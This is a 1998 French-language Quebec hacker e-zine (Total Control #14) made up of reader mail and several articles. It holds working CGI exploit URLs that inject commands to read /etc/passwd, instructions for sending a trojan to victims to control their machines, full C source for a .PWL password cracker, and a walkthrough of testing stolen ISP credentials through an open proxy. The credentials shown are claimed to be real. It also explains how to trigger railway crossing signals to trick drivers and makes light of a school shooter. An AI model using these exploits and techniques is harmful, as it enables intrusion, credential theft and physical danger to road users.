================================> NUMRO 14 <================================= _____________ _____________ ____ \____ ____\ \____ ____\ \ \ \ \ ______ \ \ ________ \ \ \ \ \ __ \ \ \ \ __ \ \ \ \___\ \ \_\ \ \___\ \ \_\ \ \ \ \_____\ \ __ \ \ \ \__\ \__\ \ \ \ \__________ \_____________\ /~~\ ______ _____ ___ _____________ __ / /~~ \ __ \ | \ | | \____ ____\ | | \ \__. \ \_\ \ | /\ \_/ | \ \ |~~~~\ _____ | | \___| \_____\ |_| |_____| \ \ | / | ___ | | | \___\ | |~\ | | |_| | | |_____ |_| \_\ |_____| |_______| ================================> NUMRO 14 <================================= *----------------------------------------------------------------------------* Total Control, Numro 14, Juin 1998 http://totalcontrol.home.ml.org *----------------------------------------------------------------------------* #tctrl (EFNET) = LE CHANNEL OFFICIEL DES LECTEURS ET STAFFS DE TOTAL CONTROL *----------------------------------------------------------------------------* /------------------\ | AVERTISSEMENT | \------------------/ Ce document contient des informations illgales si vous les utilisez mais puisque, ici, elles ne sont distribues que pour des fins ducatives, elles peuvent tre considres tant lgales (vous me suivez ?). Le personnel de Total Control ne vous encourage pas utiliser ces techniques et n'est pas responsable de l'utilisation que vous en faites. Bla bla bla... /------------------\ | Mode d'emploi | \------------------/ Pour tous les fuckin' perdus de la vie qui ne savent pas trop pourquoi ce zine est truff de "carrs noirs" la place des accents (ce qui le rend illisible) et pourquoi il est tout croche, VOUS DEVEZ LE LIRE AVEC MS-EDIT EN DOS !!! -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 0=--------------=0 | Introduction | 0=--------------=0 Par Err418 (err418@technologist.com) -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Salut tout le monde... une fois de plus, l'quipe de TC magazine vous a pondu un bon p'tit zine comme on les aime. Bien sr, nous discuterons de diffrents sujets tels que les tracks de chemin de fer du CN, la pntration des disques durs, les .pwl, ect... Comme vous pouvez le constater, beaucoup d'articles de ce numro 14 sont des squels d'articles que l'on retrouvait dans le numro 13. Il faut croire que le #13 a donn le got plusieurs de se mettre l'oeuvre :-) J'ai une couple de petites news pour vous autres... Premirement, vous avez srement entendu parler de cette autre fusillade dans un cole aux USA (damn, they SUX)... Cette fois-ci, il s'agit d'un "high school" de la ville de Springfield en Orgon. Un jeune homme, nomm Kip Kinkel, est aller dans la caftria de son cole et ouvert le feu sur ses copains. Personnellement, je le trouves dbile mais j'ai quelques choses d'assez intressant sur ce gars l : c'tait le gars qui s'occupait de PLA of OREGON. C'est marrant en crisse. a veut dire que vous avez peut-tre dj chatter avec ce dbile l si vous vous tenez sur le site et le channel de PLA. Bon ben, pour l'autre news, c'est un peu moins drle.. mais c'est tout de mme intressant... vous avez srement entendu parler des "trois cracks en informatiques" qui se sont faits buster pour avoir diffuser des infos sur les explosifs et tout.. et bien il s'agit de la gang de Corruption Addicts. Plus, prcisement, il s'agit de PHAUST - NMARE et SLIVERTHORN. Voyez joint ce numro de TC la front page du Journal de Qc ou PHAUST y est pos est gros plan (free-ca.jpg). Le procs de dbutera le 21 juillet 1998 9h00 AM (d'aprs Nmare). J'essayerai d'tre sur place et mme qu'il est possible que TC organise une manifestation @FREE SPEECH@. Sachez que le 2600 et the Blue Ribbon Organisation vont appuyer les membres de C-A dans leurs dmarches. Alors, c'est tout ce que y'avait comme news et maintenant voici notre programme principal. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Le courrier des lecteurs -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Voici le courrier des fidles lecteurs... ---------------Cut Here--------------------- From: "GL[a]CiUs" To: Subject: ToTaL CoNtRoL Date: Thu, 28 May 1998 06:21:36 +0200 S'lut err418 Je t'cris juste pour t'encourager dans ce que tu fais , pis de continuer, c'est tres interressant ton zine. Pis j'aimerais remercier une personne, j'peux pas la nommer donc on j'l'appelle MrX . MrX (qui se reconnais c sr) je tiens te remercier pour tout ce que tu fais pour moi, hacking, phreaking , etc... C'est lui qui me montre tout, c'est la meilleure personne que je connaisse en hacking, pis j'cris ce e-mail pour que cette personne le voie et se propose a un poste dans ta revue en tant que rdacteur d'article de hacking. Err418, tu la connais peut-tre, touka j'espre qu'il aura le gots de se proposer. Pis j'aimerais souhaiter bonne chance a phaust et nightmare :~( . J'suis dsoler pour vous les mecs. Malgr que je vais surement all les rejoindre un jour Take care dude , fuck you all lamer , GL[a]CiUs de #Centre-ville (undernet) Rponse : --------- TC: Hhh, Glacius, je sais trs bien de qui tu parles... c'est vrai que c'est un gars de haut "calibre". En tout cas... j'espre qu'il est touch par tes chaleureux remerciments. ---------------Cut Here--------------------- From: le_disciple@hotmail.com To: err418@technologist.com Subject: Total Control Date: Tue, 02 Jun 1998 19:57:29 PDT Salut! Je viens de me taper les 13 numeros de TC, et je dois te feliciter: bon boulot! Je suis vraiment heureux qu'enfin un magazine quebecois apparaisse; je croyais etre le seul H/P au Quebec! Incidemment, j'ai vu ta demande d'articles sur ta page Web, et je penses bien pouvoir en ecrire. A toi d'en juger: j'ai quelque chose comme 10 ans d'experience dans le H/P (je suis pas un vieux sec, j'ai juste commence jeune...), je reste dans le 514, et j'ai plein d'idees. En plus, je suis en vacances jusqu'en septembre! En tout cas, j'aime pas donner trop d'info par e-mail (securite nulle), mais si ca t'interesse, donnes-moi des nouvelles a cette adresse bidon; on pourra se donner rendez-vous sur IRC. Le Disciple Rponse : --------- TC: Super ta proposition... mais tu sais.. on aura la chance de se reparler sur le channel qu'on s'est vu l'autre jour :-) En passant, ne t'inquite pas, tu n'est pas le seul hacker au Qubec. ---------------Cut Here--------------------- From: phill@netlimit.com To: Subject: Question?? Date: Thu, 11 Jun 1998 16:23:14 -0400 Est-ce que vous avez un login et un pass pour le lien vers le site "Pour les acheteur "registred" de Millenium" ?? Si oui, j'aimerais l'avoir !! Phill Rponse : --------- TC: Ben tu sais phill on travaille l dessus notre accs cette partie du site... cependant, si j'en dcroche un (access) je crois pas que je vais le donner tout le monde... j'va aller checher ce que j'ai besoin avant tout. ---------------Cut Here--------------------- From: dgodro@total.net To: err418@technologist.com Subject: a propos de tctrl.... Date: Fri, 12 Jun 1998 17:37:59 -0700 Salut Err418, Je t'crit car t'avait l'air de croire que personne lisait ton e-mags. Ben moi j'trouve ca d'valeur que tu pense ca (en tk c'est ce que ta dit dans le numero 4 ou 5) parce que ton emags y'est super cool en plus c'est en francais et faite par un quebecois pis j'ai ben aimer le truc de harceler qqun avec les petites annonces pis toute le kit. En tk jtrouve que toi et ton equipe vous faite une ben bonne job. Un lecteur de tctrl, Bistro Rponse : --------- TC: Merci de ton encouragements... Tu sais.. les #4 et #5 sont assez vieux.. maintenant, nous sommes conscient que TC magazine est assez lu puisque nous avons plus de 20 hits/jour sur le site. Merci, See ya ! err418 ---------------Cut Here--------------------- That's all folks. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Les Bugs CGI Par Err418 (err418@technologist.com) -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Avertissement : Certaines lignes de cet article peuvent dbordes du cadre de ============= lecture puisqu'il sagit de longues commandes qui s'crivent sur une seule ligne. J'ai gard la longueur originale pour une meilleure comprhension. Merci de votre comprhension. Pour certains, le plus dur dans le hacking c'est de rcuprer la passwd file. Alors, voici pour vous diffrents bugs CGI qui vous permettront d'accder la passwd file et d'autres fonctions du OS. Premirement, voici le INFAMOUS bug PHF que presque tout le monde connait : http://www.victime.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd Bien sr ce bug est vieux et il n'est pas trs trs efficace puisqu'il est patch sur presque tout les serveurs. Je vous conseille de tester les vieux .edu perdus.. quelques fois vous tomberez sur le gros lot. Voici maintenant, d'autres bugs CGI qui sont un peu moins connus que vous devriez essayer lors d'une tentative de rcupration de passwd file... /cgi-bin/htmlscript?../../../../../etc/passwd /cgi-bin/php.cgi?/etc/passwd /cgi-bin/phftemp?Qalias=x%0a/bin/cat%20/etc/passwd /cgi-bin/phf?Qalias=3Dx%0a/bin/cat%20/etc/passwd /cgi-bin/phf?Qalias=3Dx%0a/bin/cat%20/etc/passwd%0Apwd%0Aid% /usage/mnth9.html/cgi-bin/phf?Jserver=foobar.com%0Acat%20/etc/passwd%0A&Qalias=& /cgi-bin/wais.pl/set%20Gopher=/bin/cat%20/etc/passwd /cgi-bin/fi?/etc/passwd /cgi-bin/webdist.cgi?/bin/mail%20:/etc/passwd[me@myhost.com] /cgi-bin/view-source?../../../../../../../etc/passwd Les 2 prochains qui suivent sont des commandes en protocole HTTP que vous devez tapp en vous connectant sur le port 80 avec un client telnet. En fin de compte, vous simulerez des commandes que le browser web envoye au serveur habituellement... GET /cgi-bin/phf?Jserver=foobar.com%0Acat%20/etc/passwd%0A&Qalias=&Qname=foo&Qemail=&Qnickname=&Qoffice_phone=&Qcallsign=&Qproxy=&Qhigh_school=&Qslip= GET /cgi-bin/phf?Jserver=foobar.com%FFcat%20/etc/passwd%FF&Qalias=&Qname=foo&Qemail=&Qnickname=&Qoffice_phone=&Qcallsign=&Qproxy=&Qhigh_school=&Qslip= GET /cgi-bin/php.cgi?/etc/passwd Voici un autre petit bug CGI qui lui permet d'obtenir un listing des fichiers d'un rpertoire... (pas trs utile mais amusant) /cgi-bin/wrap?/../../../../../etc Pour conclure, j'aimerais vous inviter inventer vous mme diffrentes commandes... voici des exemples que j'ai inventer partir du bug PHF : /cgi-bin/phf?Qalias=x%0a/bin/ls%20-l%20/ ------------\ | Changer le / de la fin par n'importe quel rpertoire <-| /cgi-bin/phf?Qalias=x%0aid /cgi-bin/phf?Qalias=x%0auname%20-a /cgi-bin/phf?Qalias=x%0awhoami etc... les possibilits sont infinies. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Comment faire dclancher les passages niveaux. Mthode II Cluster (cluster@comports.com) -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= J'ai dcouvert un moyen extrmement simple pour dclancher les passage niveau du CN. Matos: 1 Fil lectrive d'environ 2 mtres (ou n'importe quelle cossin conducteur) 1 du tape [lectrique] (si c'est un fil souple) Premirement tu tape un bout du fil (dnud bien sur) sur une rail. S'assurer qu'il sois bien en contact avec la rail. (si c'est metton c'est une barre de fer ben ta juste la mettre en travers de la track mais ce N'EST PAS RECOMMAND). Si tu as peur de te faire pogner proche de la rue, ben ta juste aller plus loin (-+ 100m); tu peux te rendre jusqu' l'autre boite grise (la plus petite). Pour savoir si les 2 rails peuvent tre branches entre elles ta juste checker la jonction de 2 rails, si il y a un espce de fil du genre cable d'acier sa veut dire que tu peux encore brancher ton fil. Deuximement tu sacres l'autre bout du fil sur la rail oppos. Patienter quelques secondes (+- 5 secs) La tu dcrisses si tu veux pas te faire pogner parce que sa va sonner! Choses utiles faire avec sa: Tu peux te prendre un peu plus long de fil et le cacher entre les rails, tu mets le contact et tu le laisse pour nerver tes voisins. Tu surveilles si un automobiliste (ou un trucker) arrive pis tu mets le contact. Avec les autobus c'est encore plus crampant parce qu'ils sont suposs tre OBLIGER d'attendre que la lumire sois teinte. HAHaaHhaAHAH Si vous avez d'autres bonne ides envoyer moi a: cluster@comports.com. Est-ce que quelqu'un pourrait essayer sa sur un passage avec des barrires!? Je ne sais pas si sa marche (moi c'tait simplement avec des lumire et une cloche). -----------CUT HERE---------------- La Presse, dimanche 17 mai 1998 Un automobiliste a eu la peur de sa vie dans la nuit de vendredi samedi, lorsque la camionnette qu'il conduisait a t happe par un train, au passage niveau du boulevard du Sminaire, Saint-Jean. Le vhicule a t train sur une distance de huit kilomtres, soit jusqu' un croisement de voie, o il a gliss sur le cot de la voie. Fait encore plus inusit, le conducteur de la locomotive ne s'est pas aperu qu'il avait heurt un vhicule. Ce n'est qu' Brossard que le train a t immobolis et que les dommages on t constats sur la locomotive. Le chauffeur de la camionnette a t transport l'hopital de Saint-Jean o il se trouve dans un tat satisfaisant. La police ignore les circonstances exactes de l'accident. -----------CUT HERE---------------- Faites attention lorsque vous gossez avec les affaires du CN et je vous rappelle que Total Control n'est aucunement responsable de ce que vous faisez avec les informations contenues dans ce magazine! -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Comment pntr un disque dur sans se casser la tte Lord Nikon (nikonstock@hotmail.com) -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= INTRODUCTION ============ Dans le fond tout le monde se dit que c'est difficile pntr un disque dur et la pluspart des hackers vous propose des truc en Linux ou bien en windows mais qui sont quand mme difficile a apprendre pour un newbie, ce ptit bout de texte va vous expliqu comment pntr le disque dur de kekun grace a son ip et a l'aide de 2 petits programme. CHOSE SRIEUSE ============== C'est a partir d'ici que les choses srieuse commence, vous devez downloader pour commencer le premier programe (control.exe) celui la c'est votre client et l'autre (host.exe) c'est votre serveur. (Note de Err418 : ces deux fichiers sont joints ce numro) En installant ce programe, vous accderez au disque dur de votre victime par le port 5000 donc le programe host (host.exe) sert de serveur qui agit sur le port 5000. 1: Le port 5000 ne peut recevoir qu'une connection a la fois donc ne pensez pas a pirater 2 sur le mme ordinateur en mme temps. 2: Quand le client est activ, il peut servir de host en mme temps alors attention il faut vous protg, les meilleur protection que j'ai trouv jusqu' maintenant: Nuke Nabber (et oui ce petit programe anti-nuke a chier est enfin utile a quelque chose) et il y a aussi Conseal PC Firewall. En ouvrant le programe, il va vous demander un mot de passe, qui est: 666 C/S JCzic... (Mettez les espace, les majuscule, le slash et les 3 ptit point sinon le password marchera pas.) Deuximement, je vais vous donner un bref mode d'emploi mais tant donn que mme mon petit con de frre de 11 ans sait s'en servir seul alors il ne devrais pas y avoir trop de problme. 1: Vous devez d'abord envoyer la file host.exe a kelkun sur le net, ensuite il doit l'activer (l'excuter) et quand il va l'avoir activ, ca va dire : "setup32.dll not found" C'est parfait parce que ca veux dire que ca marche. partir de ce moment, vous pouvez entrer dans son ordi grce a son adresse ip (sur IRC faites /dns ou sur icq dans info). Vous pouvez restarter son ordis, uploader des virii et les excut a distance sans aucun risque pour votre petite machine, vous pouvez downloader tout ce dont vous dsir. 2: Allez voir la section Mirc, trs utile si vous voulez prendre le controle d'un channel IRC et vous all tre le seul op, cool non ! EN RSUM : HOST.EXE --> C'est le trojan horse CONTROL.EXE --> C'est votre console de contrle -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= wEED girl calimes (vampire_27@hotmail.com) -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Bonjour tous! H oui, j'me suis enfin dcid a crire un foutu article pour ce journal. a fait un mchant bout que Err418 me pousse dans l'cul alors j'me suis dit : "Calimes, tu vas t'moover !" Soit dit en passant, moi j'vous parlerais pas de hacking ni de phreaking, parce que j'y connais rien. Tout ce que je connais c'est ce qui est crit dans ce journal, mais pensez pas que j'aime pas a l!!! Au contraire, j'ai tellement passe d'heures buzze avec Err418 devant un tlphone public que je commence y prendre got. Et voil justement le sujet principal de mes articles futurs [a reste voir :-) ] : le wEEd, les buzz trippants qu'on a eu moi et Err418 (ou d'autres personnes) et des sujets du genre... Donc, si vous tes contre l'utilisation des paradis artificiels, arrtez-vous drette l. Sinon, ce qui suit peut vous intresser (enfin, je l'espre) !! Bon, comme moi et Err ont dit souvent : la vie c'est fait pour tre vcu (pas trs recherch, mais bon). J'en suis venu une thorie qui me semble trs plausible : Y'a du monde qui disent que fumer du pot c'est nul parce qu'on est plus nous mme, parce qu'on s'en sert pour oublier nos problmes, etc.. etc... Mais moi j'me dis : pourquoi arrter de faire quelque chose qui nous fait du bien ?? Vraiment, j'vois pas... Merde, c'est vrai, si on en prend c'est que a nous apporte quelque chose de plaisant, non ? Pourquoi refuser ce qui nous fait du bien??? C'est sr qu'il y a des limites se faire plaisir mais faudrait pas dramatiser quand mme !!! Facque vive la libert d'action !!! 12h30PM, moi et Err418, on dcide de s'rouler un top, question de passer au travers de notre premire journe de vacances sans ennui. 12h45PM, on s'rend au lieu de notre principal fournisseur, L'ARCADE, ou tout les petits pushers de la ville se battent pour vendre leur stock. On dcide de jouer une p'tite game de Tetris (jeu qui met en valeur le quotient intellectuel) question de montrer que y'a pas juste le wEED qui nous intresse... mais en ralit, on en a rien foutre de ce jeu qu'on a chez-nous sur l'ordi... tout ce qu'on a en tte c'est notre wEED. De toute faon, fuck that, le "bouncer" de l'arcade (un p'tit don juan maigre et croyant avoir de l'autorit sur nous) nous dit de foutre le camp si on dpense pas au moins 1$ dans ses machines... y'en veut pas d'notre cash, tant pis pour lui, on s'en va !! 1h00PM, le monde est tellement habitu de nous voir venir chercher d'la poffe que tout le monde vient nous demander si on veut du pot... c'Est cool, mme pas besoin de courir aprs. 1h15PM, on se rend un endroit cool ou on aime bien tirer des joints : un mur de bton haut de 9 pieds qui donne face une rue ou y'a crissement pas beaucoup de circulation. Malheureusement, vu que c'est prs d'un stationnement pis que le surveillant (un encul mon avis) arrive, on se doit de quitter la place... mais l, c'est quoi qui arrive pas, on dcide de fumer en s'en allant, mais cet "encul de ma mre" nous suit! Faut tu pas tre coeurer !! Finalement, aprs au moins 30 minutes de tettage, on finit par terminer ce bat pis on est crissement partis. 1h45PM, on dcide d'entrer l'cole pour s'acheter une Root Beer (c'est Err qui boit a, pas moi !) pis l je pense un mchant bon pacte que je pourrais faire avec Err418. J'lui dis : "on pourrait dcider de fumer des occasions spciales, du style : la fin de l'anne, les partys, quelqu'un c'est trouv une job, des niaiseries du genre"... Il me dit : "ouin, c'est pas pire a !" Mais le HIC c'est qu'on a tellement souvent d'occasions de le faire qu'on va pourvoir se dire qu'on moins on a une bonne raison de le faire !!! (je sais pas si vous comprenez ?) C'est pas une bonne ide a ? (Rponse de Err418 : "Ben non pas vraiment !") 2h00PM, On est donc repartis l dessus en se disant qu'on s'en crissait vraiment qu'on ait une raison ou pas, mais j'tais ben contente d'avoir penser a quand mme! Ce serait ben l'fun que j'vous raconte le reste de notre journe, mais vous risquez de trouver a assez ennuyeux... on s'est effoir un peu partout pis on a invent un scnario de film.. j'vous parlerai un autre jour du film (si on dcide de le faire) En tout cas, a vraiment t une journe cool!! Pis a s'est termin avec un mchant gros trippe bouffe!! HH! Bye, j'vous dit l'bonjour ! -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Comment cracker un .PWL Par cluster (cluster@comports.com) -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Premirement un .PWL c'est comme le /etc/passwd d'une machine UNIX sauf pour Windows. Sa contient plusieurs login et passwd comme celui de l'ouverture de session de Windows et celui pour se plugger son ISP. Donc, vous piquer le ou les .PWL (c:\windows). Example dans un magasin ou vous utiliser les techniques que nous avons parler dans Total Control #14. Aprs avoir piquer le .PWL sur l'ordi de votre victime vous utiliser GLIDE pour le decrypter. C:\>glide m0onbeam.pwl Username: m0onbeam.pwl Sizemask: 18DE Analyzing block with size:0000 (0:1) Analyzing block with size:0000 (1:0) Analyzing block with size:0000 (2:0) Analyzing block with size:0000 (3:0) Analyzing block with size:0000 (4:0) Analyzing block with size:0000 (5:0) Analyzing block with size:0000 (6:0) Analyzing block with size:0000 (7:0) Analyzing block with size:0000 (8:0) Analyzing block with size:0000 (9:0) Analyzing block with size:002e (10:1) Analyzing block with size:0000 (11:0) Analyzing block with size:0000 (12:0) Analyzing block with size:0000 (13:0) Analyzing block with size:0000 (14:0) Analyzing block with size:0000 (15:0) 54 bytes of keystream recovered Resource[0] (2) Resource[1] (2) Resource[2] (2) Resource[3] (2) Resource[4] (2) Resource[5] (2) Resource[6] (2) Resource[7] (2) Resource[8] (2) Resource[9] (2) Resource[10] (48) .   *Rna\Microtec - Qubec\etincellvio2770 <-- Nous pouvons dduire que Resource[11] (2) c'est un account PPP qui Resource[12] (2) utilise le dialup de Resource[13] (2) Windows (RNA). Resource[14] (2) Resource[15] (2)   *Rna\Microtec - Qubec\etincellvio2770 ^^^^^^^^^^^^^^^ Ce sont le login et le passwd de son account. Tout ce que nous avons faire maintenant c'est de dterminer ou se spare le login du passwd, pour cela nous nous branchons sur le port 110 du server de mail de Microtec. Dans ce cas ci: microtec.net [204.50.80.57]. Si ce n'est pas sur le server principal de l'ISP c'est souvent mail.le_nom_du_fournisseur.com. Pour cette partie je vous conseil d'utiliser un firewall du style "Wingate" (24.226.3.4 est perm). C'est beaucoup plus rapide et scuritaire de tester les combinaisons par le server de mail que se brancher chez microtec par dialup et essayer les combinaisons. WinGate>microtec.net 110 Connecting to host microtec.net...Connected +OK r2d2.microtec.net Cyrus POP3 v1.5.2 server ready user etincell +OK Name is a valid mailbox pass vio2770 +OK Maildrop locked and ready Bravo! C'est le bon login et passwd! Maintenant vous avez juste pogner le # de tlphone pour se brancher chez Microtec et Hop! un account gratos utiliser ou trader. Notes: Les rponses du server peuvent tre diffrentes selon le type de deamon que le fournisseur utilise. Les .PWL de Win98 ne sont PAS compatible avec GLIDE. OUI m0onbeam.pwl utiliser dans cette article est vrai. Mais ne l'utiliser pas parce que c'est illgal d'utiliser cette account. Voici les sources de GLIDE.C (Je ne sais pas qui est l'auteur) ------------------->8 CUT HERE 8<------------------- #include #include unsigned char Data[100001]; unsigned char keystream[1001]; int Rpoint[300]; main (int argc,char *argv[]) { FILE *fd; int i,j,k; int size; char ch; char *name; int cracked; int sizemask; int maxr; int rsz; int pos; int Rall[300]; /* resource allocation table */ if (argc<2) { printf(" GLiDE PWL CRACKER\n\n"); printf("Licensed to Total Control\n\n"); printf("usage: glide filename (username)"); exit(1); } /* read PWL file */ fd=fopen(argv[1],"rb"); if(fd==NULL) { printf("can't open file %s",argv[2]); exit(1); } size=0; while(!feof(fd)) { Data[size++]=fgetc(fd); } size--; fclose(fd); /* find username */ name=argv[1]; if(argc>2) name=argv[2]; printf("Username: %s\n",name); /* copy encrypted text into keystream */ cracked=size-0x0208; if(cracked<0) cracked=0; if(cracked>1000) cracked=1000; memcpy(keystream,Data+0x208,cracked ); /* generate 20 bytes of keystream */ for(i=0;i<20;i++) { ch=toupper(name[i]); if(ch==0) break; if(ch=='.') break; keystream[i]^=ch; }; cracked=20; /* find allocated resources */ sizemask=keystream[0]+(keystream[1]<<8); printf("Sizemask: %04X\n",sizemask); for(i=0;i<256;i++) Rall[i]=0; maxr=0; for(i=0x108;i<0x208;i++) { if(Data[i]!=0xff) { Rall[Data[i]]++; if (Data[i]>maxr) maxr=Data[i]; } } maxr=(((maxr/16)+1)*16); /* resource pointer table size appears to be ivisible by 16 */ /* search after resources */ Rpoint[0]=0x0208+2*maxr+20+2; /* first resource */ for(i=0;i> 8) & 0x00ff; } cracked+=maxr*2+2; printf("%d bytes of keystream recovered\n",cracked); /* decrypt resources */ for(i=0;i < maxr;i++) { rsz=Rpoint[i+1]-Rpoint[i]; if (rsz>cracked) rsz=cracked; printf("Resource[%d] (%d)\n",i,rsz); for(j=0;j8 CUT HERE 8<------------------- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Dboires avec Qubectel et HUMOUR de newbies Par Maniak (maniakz@yahoo.com) -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= WRITTEN BY MANIAK FOR: T O T A L C O N T R O L M A G A Z I N E Ϳ Ϳ 1 Quebectel & haCKiNg gUiDe fOr nEwBiEs 1 9 9 9 (WQ) -- MANIAK -- (WQ) 9 5 8 ٰ a N t i L a M e R z S u P e R s T a R ٰ ٰ Bonjour, ceci sont mes premiers crits dans le TC magazine. Je ne vous apprendrai peut-tre rien au sujet du h/p/v/a/c puisque ce n'est pas le but de mon article qui se divise en deux parties: 1- Mon aventure avec le service internet GLOBETROTTER de Quebectel. 2- Un guide de hacking pour les dbutants (lire l'introduction!!!) Ϳ Ma dcouverte du rseau internet avec l'quipe de GLOBETROTTER inc. Le rseau internet comme vous le savez est quelque chose de formidable qui reprsente de faon certaine le futur des tlcommunications. C'est un rseau auquel presque tout le monde peu avoir accs avec un ordinateur. a fait environ 4 ans maintenant que j'ai un ordinateur, j'ai encore le mme aujourd'hui. Depuis le dbut de 1995, j'ai acces internet avec le service internet GLOBETROTTER de Quebectel. Avant que les longues distances avec la ville de Qubec ne soit abolis (en dcembre dernier), Globetrotter tait le seul service internet disponible dans ma rgion! Ds le dbut j'ai eu un petit intrt pour le cot un peu 'UNDERGROUND' (probablement comme vous...). Tout a toujours bien t, je ne fesais pas de conneries, j'ai toujours utilis un compte entirement lgal que je payais: (moiti avec parents) 20$/mois. Quebectel offre un service internet que je pourrais qualifier de rapide et fiable. Le service la clientle est assez bon (quand vous parler une autre personne qu'une tlphoniste de GLOBETROTTER (ex: un technicien)). J'ai dj eu de ptits probs de connection et on m'a toujours dpann... Mais, il y a environ.... (6 mois?) j'ai reu une premire plainte pour m'avertir que nuker un utilisateur irc tait illgal. N'importe quel con peut nuker direz-vous, je sais. J'avou que j'avais vraiment nuker cet internaute parce qu'il me tombait sur les nerfs (Sub-Zero). Et je peux dire mme que je le comprend d'avoir envoyer une plainte ce sujet. Cependant, les vrais troubles ont commencs dans le mois de Mars et a je peut difficilement l'accepter. Durant un mercredi en plein milieu du mois de Mars j'ai reu un appel tlphonique de Quebectel me disant que je m'tait introduit illgalement dans les servers de L'UQUAM (universit du Qubec Montral) et que j'avais vol des credit cards #. HAHAHA, belle joke n'est-ce pas? La premire chose que je me suis demand est comment et pourquoi j'aurais hacker une universit au Qubec dans le but d'y voler des cc#. Aurais-je vraiment utiliser mon vritable IP si j'aurais eu une ide aussi bizarre et stupide que de hacker un server Qubcois dont je ne connais mme pas la structure du rseau anyway? Voler des cc# sur le server telnet d'une universit? Je n'ai toujours pas compris comment cela pourrait tre possible. De toute faon, voler des cc# aurait d tre fortement rprimend par la GRC et j'aurais du d'ailleurs avoir eu leur visite puisque l'UQUAM avait mon ip et n'avait qu' demander Quebectel de transfrer mon cas directement la GRC. On ne parle plus d'un simple nuke, on parle maintenant de FRAUDE. Tout a a pass sans que j'en ait aucunes nouvelles. Je n'ai mme pas pu prendre contact avec l'administrateur du server de l'UQUAM puisque GLOBETROTTER 